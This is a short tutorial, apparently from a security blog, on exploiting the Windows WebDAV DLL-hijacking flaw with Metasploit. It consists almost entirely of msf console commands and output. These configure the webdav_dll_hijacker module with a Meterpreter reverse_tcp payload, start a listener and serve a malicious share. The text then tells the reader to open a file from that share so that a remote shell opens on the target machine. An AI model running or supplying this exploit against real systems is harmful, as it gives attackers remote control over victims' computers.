Exploiting the WebDAV Vulnerability

In order to exploit or test applications for the new WebDAV vulnerability, which we've covered here: http://greyhat-security.com/40-220-windows-exes-vulnerable-remote-code-execution-so-far, you will need to fire up your copy of Metasploit, and type the following:

msf > use exploit/windows/browser/webdav_dll_hijacker
msf exploit(webdav_dll_hijacker) > set EXTENSIONS "txt mp3 rtf"
EXTENSIONS => txt mp3 rtf
msf exploit(webdav_dll_hijacker) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
smsf exploit(webdav_dll_hijacker) > set LPORT 4444
LPORT => 4444
msf exploit(webdav_dll_hijacker) > set LHOST <your_ip>
LHOST => <your_ip>
msf exploit(webdav_dll_hijacker) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on <your_ip>:4444
[*]
[*] Exploit links are now available at \\<your_ip>\documents\
[*]
[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://<your_ip>:80/
[*] Server started.

Now, just head on over to the network share and open up a file with any application you'd like to test. Simple as that - it will open up a "Meterpreter Reverse TCP Shell" on the system which accesses the file.